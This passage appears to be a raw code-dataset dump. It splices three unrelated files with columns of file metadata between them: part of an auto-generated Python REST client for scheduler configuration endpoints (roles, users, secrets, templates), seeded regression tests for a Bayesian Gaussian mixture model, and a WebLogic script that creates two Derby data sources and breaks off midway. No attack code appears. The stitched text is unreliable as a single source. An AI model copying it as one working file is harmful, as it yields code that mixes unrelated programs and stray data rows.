        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Note: unlike the sibling update endpoints this one uses PUT.
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'PUT',
        path_params,
        [],  # query params
        header_params,
        body=params['body'],
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_role(self, role_file, role, **kwargs):  # noqa: E501
    """Update Authorization Role.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_role(role_file, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str role_file: (required)
    :param str role: The Role name. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_role_with_http_info(role_file, role, **kwargs)  # noqa: E501
def update_role_with_http_info(self, role_file, role, **kwargs):  # noqa: E501
    """Update Authorization Role.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_role_with_http_info(role_file, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str role_file: (required)
    :param str role: The Role name. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('role_file', 'role', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'role_file': role_file, 'role': role}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_role" % key
            )
        params[key] = val
    # Both positional parameters are required and must not be None.
    if params.get('role_file') is None:
        raise ValueError("Missing the required parameter `role_file` when calling `update_role`")  # noqa: E501
    if params.get('role') is None:
        raise ValueError("Missing the required parameter `role` when calling `update_role`")  # noqa: E501
    # Value substituted into the URL path template.
    path_params = {'role': params['role']}
    # The role definition is sent as a multipart file upload, so there
    # is no JSON body; the file goes in the `files` mapping instead.
    local_var_files = {'roleFile': params['role_file']}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters.
    return self.api_client.call_api(
        '/config/authorization/role/{role}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=None,
        post_params=[],
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_run_as_user(self, body, server, agent, user, **kwargs):  # noqa: E501
    """Update Run-as user details in server.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_run_as_user(body, server, agent, user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param RunAsUserDetailsData body: Run as user details data (required)
    :param str server: The Server. (required)
    :param str agent: The Agent (required)
    :param str user: The user name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_run_as_user_with_http_info(body, server, agent, user, **kwargs)  # noqa: E501
def update_run_as_user_with_http_info(self, body, server, agent, user, **kwargs):  # noqa: E501
    """Update Run-as user details in server.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_run_as_user_with_http_info(body, server, agent, user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param RunAsUserDetailsData body: Run as user details data (required)
    :param str server: The Server. (required)
    :param str agent: The Agent (required)
    :param str user: The user name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('body', 'server', 'agent', 'user', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'body': body, 'server': server, 'agent': agent, 'user': user}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_run_as_user" % key
            )
        params[key] = val
    # Every positional parameter is required and must not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_run_as_user`")  # noqa: E501
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `update_run_as_user`")  # noqa: E501
    if params.get('agent') is None:
        raise ValueError("Missing the required parameter `agent` when calling `update_run_as_user`")  # noqa: E501
    if params.get('user') is None:
        raise ValueError("Missing the required parameter `user` when calling `update_run_as_user`")  # noqa: E501
    # Values substituted into the URL path template.
    path_params = {'server': params['server'],
                   'agent': params['agent'],
                   'user': params['user']}
    # Negotiated request/response headers.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters and no file uploads.
    return self.api_client.call_api(
        '/config/server/{server}/runasuser/{agent}/{user}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=params['body'],
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_secret(self, name, **kwargs):  # noqa: E501
    """Update an existing secret in the secrets vault.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_secret(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the secret to update (required)
    :param SecretValue body: The new value for the secret
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_secret_with_http_info(name, **kwargs)  # noqa: E501
def update_secret_with_http_info(self, name, **kwargs):  # noqa: E501
    """Update an existing secret in the secrets vault.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_secret_with_http_info(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the secret to update (required)
    :param SecretValue body: The new value for the secret
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands; `body` is an
    # OPTIONAL keyword here, unlike the sibling update endpoints.
    accepted = ('name', 'body', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    params = {'name': name}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_secret" % key
            )
        params[key] = val
    # Only `name` is mandatory.
    if params.get('name') is None:
        raise ValueError("Missing the required parameter `name` when calling `update_secret`")  # noqa: E501
    # Value substituted into the URL path template.
    path_params = {'name': params['name']}
    # Negotiated request/response headers.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Bearer authentication; body is sent only when the caller gave one.
    return self.api_client.call_api(
        '/config/secret/{name}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_user(self, user_file, user, **kwargs):  # noqa: E501
    """Update user.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_user(user_file, user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user_file: (required)
    :param str user: The user name. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_user_with_http_info(user_file, user, **kwargs)  # noqa: E501
def update_user_with_http_info(self, user_file, user, **kwargs):  # noqa: E501
    """Update user.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_user_with_http_info(user_file, user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user_file: (required)
    :param str user: The user name. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('user_file', 'user', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'user_file': user_file, 'user': user}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_user" % key
            )
        params[key] = val
    # Both positional parameters are required and must not be None.
    if params.get('user_file') is None:
        raise ValueError("Missing the required parameter `user_file` when calling `update_user`")  # noqa: E501
    if params.get('user') is None:
        raise ValueError("Missing the required parameter `user` when calling `update_user`")  # noqa: E501
    # Value substituted into the URL path template.
    path_params = {'user': params['user']}
    # The user definition is sent as a multipart file upload, so there
    # is no JSON body; the file goes in the `files` mapping instead.
    local_var_files = {'userFile': params['user_file']}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters.
    return self.api_client.call_api(
        '/config/authorization/user/{user}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=None,
        post_params=[],
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_zos_template(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Update z/OS Template.

    Convenience wrapper around `update_zos_template_with_http_info`.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead (call ``thread.get()`` for the result).

    :param async_req bool
    :param ZosTemplateData body: z/OS Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The z/OS Template Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper want only the response body, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous: hand the request thread straight back.
        return self.update_zos_template_with_http_info(
            body, server, agent, template_name, **kwargs)  # noqa: E501
    # Synchronous: with the flag above set, the *_with_http_info variant
    # already returns just the deserialized data.
    return self.update_zos_template_with_http_info(
        body, server, agent, template_name, **kwargs)  # noqa: E501
def update_zos_template_with_http_info(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Update z/OS Template  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_zos_template_with_http_info(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ZosTemplateData body: z/OS Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The z/OS Template Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted arguments: the four positional parameters
    # plus the generic per-request options understood by call_api.
    all_params = ['body', 'server', 'agent', 'template_name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot of locals() collects {body, server, agent, template_name,
    # kwargs}; unknown keyword arguments are rejected, known ones are
    # folded into `params`.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_zos_template" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `update_zos_template`")  # noqa: E501
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `update_zos_template`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `update_zos_template`")  # noqa: E501
    # verify the required parameter 'template_name' is set
    if ('template_name' not in params or
            params['template_name'] is None):
        raise ValueError("Missing the required parameter `template_name` when calling `update_zos_template`")  # noqa: E501

    collection_formats = {}

    # URL path substitutions; note template_name maps onto the
    # camelCased {templateName} placeholder of the route.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    if 'template_name' in params:
        path_params['templateName'] = params['template_name']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The template payload travels as the request body, not as form data.
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 40.910681
| 356
| 0.607723
| 49,913
| 432,835
| 5.038507
| 0.009396
| 0.052424
| 0.022713
| 0.029202
| 0.984608
| 0.978659
| 0.973856
| 0.968432
| 0.963064
| 0.95768
| 0
| 0.016399
| 0.301221
| 432,835
| 10,579
| 357
| 40.914548
| 0.815084
| 0.328435
| 0
| 0.821939
| 1
| 0
| 0.201124
| 0.054005
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035302
| false
| 0.001205
| 0.000689
| 0
| 0.088858
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7a979a7f64f23764ed5d8eb9868f38a75d08e079
| 4,672
|
py
|
Python
|
pybgmm/tests/test_fbgmm.py
|
junlulocky/BGMM
|
9e3fb310a48733e66770059c8157d55e9d341529
|
[
"MIT"
] | 59
|
2017-05-21T04:04:11.000Z
|
2020-11-25T00:29:17.000Z
|
pybgmm/tests/test_fbgmm.py
|
junlulocky/BGMM
|
9e3fb310a48733e66770059c8157d55e9d341529
|
[
"MIT"
] | null | null | null |
pybgmm/tests/test_fbgmm.py
|
junlulocky/BGMM
|
9e3fb310a48733e66770059c8157d55e9d341529
|
[
"MIT"
] | 21
|
2017-09-13T22:46:04.000Z
|
2019-05-05T20:07:52.000Z
|
"""
Author: Herman Kamper
Contact: kamperh@gmail.com
Date: 2014
"""
import numpy as np
import numpy.testing as npt
import random
from bayes_gmm.niw import NIW
from bayes_gmm.fbgmm import FBGMM
def test_sampling_2d_assignments():
    """Regression test: Gibbs sampling on seeded 2-D data gives fixed assignments.

    The expected component assignments below were recorded from a
    known-good run; they are valid only for this exact seeding and for
    the exact order of the random draws made here and inside FBGMM.
    """
    # Seed both RNG sources used by this test (and, presumably, by the
    # bayes_gmm code -- both are seeded throughout this module).
    # NOTE(review): do not reorder any of the random draws below; the
    # hard-coded expectations depend on the draw order.
    random.seed(1)
    np.random.seed(1)

    # Data parameters
    D = 2           # dimensions
    N = 100         # number of points to generate
    K_true = 4      # the true number of components

    # Model parameters
    alpha = 1.      # mixing-weight hyperparameter passed to FBGMM
    K = 3           # number of components (deliberately != K_true)
    n_iter = 10     # Gibbs sampling iterations

    # Generate data: N points drawn from K_true Gaussian clusters.
    mu_scale = 4.0
    covar_scale = 0.7
    z_true = np.random.randint(0, K_true, N)
    mu = np.random.randn(D, K_true)*mu_scale
    X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
    X = X.T

    # Initialize the NIW (normal-inverse-Wishart) prior.
    m_0 = np.zeros(D)
    k_0 = covar_scale**2/mu_scale**2
    v_0 = D + 3
    S_0 = covar_scale**2*v_0*np.eye(D)
    prior = NIW(m_0, k_0, v_0, S_0)

    # Setup FBGMM with random ("rand") initial assignments.
    fbgmm = FBGMM(X, prior, alpha, K, "rand")

    # Perform Gibbs sampling
    record = fbgmm.gibbs_sample(n_iter)

    # Assignments recorded from a reference run with seed 1.
    assignments_expected = np.array([
        0, 2, 0, 0, 2, 0, 2, 2, 2, 0, 0, 0, 0, 2, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,
        2, 0, 1, 0, 2, 1, 1, 0, 2, 2, 0, 0, 2, 1, 0, 1, 0, 0, 0, 2, 2, 0, 1, 0,
        0, 0, 0, 0, 0, 0, 0, 2, 2, 1, 0, 0, 1, 2, 2, 1, 0, 0, 0, 2, 0, 0, 0, 2,
        0, 1, 0, 0, 0, 2, 2, 1, 2, 0, 0, 0, 2, 1, 2, 2, 1, 0, 0, 1, 0, 2, 2, 1,
        2, 0, 0, 2
        ])
    assignments = fbgmm.components.assignments
    npt.assert_array_equal(assignments, assignments_expected)
def test_sampling_2d_log_marg():
    """Regression test: log marginal after Gibbs sampling matches a reference run.

    Same data generation as test_sampling_2d_assignments (identical
    seeds and draw order) but checks fbgmm.log_marg() instead of the
    assignments.
    """
    # Seed both RNG sources; the expected value depends on the exact
    # order of every random draw below.
    random.seed(1)
    np.random.seed(1)

    # Data parameters
    D = 2           # dimensions
    N = 100         # number of points to generate
    K_true = 4      # the true number of components

    # Model parameters
    alpha = 1.      # mixing-weight hyperparameter passed to FBGMM
    K = 3           # number of components
    n_iter = 10     # Gibbs sampling iterations

    # Generate data
    mu_scale = 4.0
    covar_scale = 0.7
    z_true = np.random.randint(0, K_true, N)
    mu = np.random.randn(D, K_true)*mu_scale
    X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
    X = X.T

    # Initialize the NIW prior.
    m_0 = np.zeros(D)
    k_0 = covar_scale**2/mu_scale**2
    v_0 = D + 3
    S_0 = covar_scale**2*v_0*np.eye(D)
    prior = NIW(m_0, k_0, v_0, S_0)

    # Setup FBGMM
    fbgmm = FBGMM(X, prior, alpha, K, "rand")

    # Perform Gibbs sampling
    record = fbgmm.gibbs_sample(n_iter)

    # Reference value recorded from a known-good run with seed 1.
    expected_log_marg = -415.179929416
    log_marg = fbgmm.log_marg()
    npt.assert_almost_equal(log_marg, expected_log_marg)
def test_sampling_2d_assignments_deleted_components():
    """Regression test: assignments stay contiguous when K exceeds K_true.

    With only N=10 points and K=6 components, some components should
    empty out during sampling; the expected labels {0, 1, 2} show the
    surviving components were relabeled without gaps.
    """
    # Seed both RNG sources; expectations depend on exact draw order.
    random.seed(1)
    np.random.seed(1)

    # Data parameters
    D = 2           # dimensions
    N = 10          # number of points to generate (deliberately small)
    K_true = 4      # the true number of components

    # Model parameters
    alpha = 1.      # mixing-weight hyperparameter passed to FBGMM
    K = 6           # number of components (more than the data supports)
    n_iter = 10     # Gibbs sampling iterations

    # Generate data
    mu_scale = 4.0
    covar_scale = 0.7
    z_true = np.random.randint(0, K_true, N)
    mu = np.random.randn(D, K_true)*mu_scale
    X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
    X = X.T

    # Initialize the NIW prior.
    m_0 = np.zeros(D)
    k_0 = covar_scale**2/mu_scale**2
    v_0 = D + 3
    S_0 = covar_scale**2*v_0*np.eye(D)
    prior = NIW(m_0, k_0, v_0, S_0)

    # Setup FBGMM
    fbgmm = FBGMM(X, prior, alpha, K, "rand")

    # Perform Gibbs sampling
    record = fbgmm.gibbs_sample(n_iter)

    # Reference assignments from a known-good run with seed 1.
    assignments_expected = np.array([2, 0, 1, 1, 0, 2, 0, 2, 0, 1])
    assignments = fbgmm.components.assignments
    npt.assert_array_equal(assignments, assignments_expected)
def test_sampling_2d_log_marg_deleted_components():
    """Regression test: log marginal after one iteration with K > K_true.

    Same small-N setup as test_sampling_2d_assignments_deleted_components
    but with a single Gibbs iteration, checking fbgmm.log_marg() against
    a recorded reference value.
    """
    # Seed both RNG sources; the expected value depends on the exact
    # order of every random draw below -- do not reorder.
    random.seed(1)
    np.random.seed(1)

    # Data parameters
    D = 2           # dimensions
    N = 10          # number of points to generate (deliberately small)
    K_true = 4      # the true number of components

    # Model parameters
    alpha = 1.      # mixing-weight hyperparameter passed to FBGMM
    K = 6           # number of components (more than the data supports)
    n_iter = 1      # single Gibbs iteration

    # Generate data
    mu_scale = 4.0
    covar_scale = 0.7
    z_true = np.random.randint(0, K_true, N)
    mu = np.random.randn(D, K_true)*mu_scale
    X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
    X = X.T

    # Initialize the NIW prior.
    m_0 = np.zeros(D)
    k_0 = covar_scale**2/mu_scale**2
    v_0 = D + 3
    S_0 = covar_scale**2*v_0*np.eye(D)
    prior = NIW(m_0, k_0, v_0, S_0)

    # Setup FBGMM
    fbgmm = FBGMM(X, prior, alpha, K, "rand")

    # Perform Gibbs sampling
    record = fbgmm.gibbs_sample(n_iter)

    # Reference value recorded from a known-good run with seed 1.
    expected_log_marg = -60.1448630929
    log_marg = fbgmm.log_marg()
    # Fixed: the original Python 2-only `print x` statement is a
    # SyntaxError under Python 3; print(x) behaves identically on both.
    # Kept at all because the original deliberately echoes the
    # assignments for debugging failed runs.
    print(fbgmm.components.assignments)
    npt.assert_almost_equal(log_marg, expected_log_marg)
| 24.719577
| 79
| 0.592466
| 792
| 4,672
| 3.315657
| 0.109848
| 0.019802
| 0.014851
| 0.039604
| 0.92003
| 0.871287
| 0.859863
| 0.843869
| 0.843869
| 0.811881
| 0
| 0.076531
| 0.286815
| 4,672
| 188
| 80
| 24.851064
| 0.711585
| 0.161601
| 0
| 0.8125
| 0
| 0
| 0.004201
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0
| null | null | 0
| 0.044643
| null | null | 0.008929
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ff2b2fb364f175ef657f8328e30e0fa194f4c90
| 6,082
|
py
|
Python
|
jpa/eclipselink.jpars.test/resource/weblogic/wls_derby_setup.py
|
Pandrex247/patched-src-eclipselink
|
10bbc58df62fb4f4f7ac3d8cc531263d374f0d72
|
[
"BSD-3-Clause"
] | null | null | null |
jpa/eclipselink.jpars.test/resource/weblogic/wls_derby_setup.py
|
Pandrex247/patched-src-eclipselink
|
10bbc58df62fb4f4f7ac3d8cc531263d374f0d72
|
[
"BSD-3-Clause"
] | 2
|
2021-03-24T17:58:46.000Z
|
2021-12-14T20:59:52.000Z
|
jpa/eclipselink.jpars.test/resource/weblogic/wls_derby_setup.py
|
Pandrex247/patched-src-eclipselink
|
10bbc58df62fb4f4f7ac3d8cc531263d374f0d72
|
[
"BSD-3-Clause"
] | null | null | null |
############################################################################
# Generic script applicable on any Operating Environments (Unix, Windows)
# ScriptName : wls_derby_setup.py - only for Derby DB when using Network Server
# not for Enbedded Server
# Properties : weblogic.properties test.properties
# Author : Kevin Yuan
############################################################################
#===========================================================================
# Connect to wls server
#===========================================================================
# All @TOKEN@ strings are placeholders substituted at build time from
# weblogic.properties / test.properties (see the file header).
connect('@WL_USR@','@WL_PWD@','t3://@WL_HOST@:@WL_PORT@')

#===========================================================================
# Create and configure JTA Data Source and target it to the server.
#===========================================================================
# The JTA source uses the XA driver and two-phase commit so it can join
# distributed transactions.
edit()
startEdit()

cd('/')
cmo.createJDBCSystemResource('EclipseLinkDS')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS')
cmo.setName('EclipseLinkDS')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDataSourceParams/EclipseLinkDS')
set('JNDINames',jarray.array([String('jdbc/EclipseLinkDS')], String))

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS')
cmo.setUrl('jdbc:derby://localhost:1527/ECLIPSELINK;create=true;ServerName=localhost;databaseName=ECLIPSELINK')
cmo.setDriverName('org.apache.derby.jdbc.ClientXADataSource')
set('PasswordEncrypted','@DBPWD@')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCConnectionPoolParams/EclipseLinkDS')
# Connection validation query for Derby.
cmo.setTestTableName('SQL SELECT 1 FROM SYS.SYSTABLES\r\n\r\n')

# Driver properties: user, portNumber, databaseName, serverName.
# Each property is created on the Properties node, then its value is set
# by cd'ing into the newly created child node.
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('user')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/user')
cmo.setValue('@DBUSR@')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('portNumber')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/portNumber')
cmo.setValue('1527')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('databaseName')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/databaseName')
cmo.setValue('ECLIPSELINK;create=true')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('serverName')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/serverName')
cmo.setValue('localhost')

cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDataSourceParams/EclipseLinkDS')
cmo.setGlobalTransactionsProtocol('TwoPhaseCommit')

# Target the data source at the configured server and commit the edit.
cd('/SystemResources/EclipseLinkDS')
set('Targets',jarray.array([ObjectName('com.bea:Name=@TARGET_SERVER@,Type=Server')], ObjectName))

save()
activate()

#===========================================================================
# Create and configure Non-JTA Data Source and target it to the server.
#===========================================================================
# Mirror of the block above, but with the non-XA driver and global
# transactions disabled (protocol 'None').
edit()
startEdit()

cd('/')
cmo.createJDBCSystemResource('ELNonJTADS')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS')
cmo.setName('ELNonJTADS')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDataSourceParams/ELNonJTADS')
set('JNDINames',jarray.array([String('jdbc/ELNonJTADS')], String))

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS')
cmo.setUrl('jdbc:derby://localhost:1527/ECLIPSELINK;create=true;ServerName=localhost;databaseName=ECLIPSELINK')
cmo.setDriverName('org.apache.derby.jdbc.ClientDataSource')
set('PasswordEncrypted','@DBPWD@')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCConnectionPoolParams/ELNonJTADS')
cmo.setTestTableName('SQL SELECT 1 FROM SYS.SYSTABLES\r\n\r\n')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('user')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/user')
cmo.setValue('@DBUSR@')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('portNumber')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/portNumber')
cmo.setValue('1527')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('databaseName')

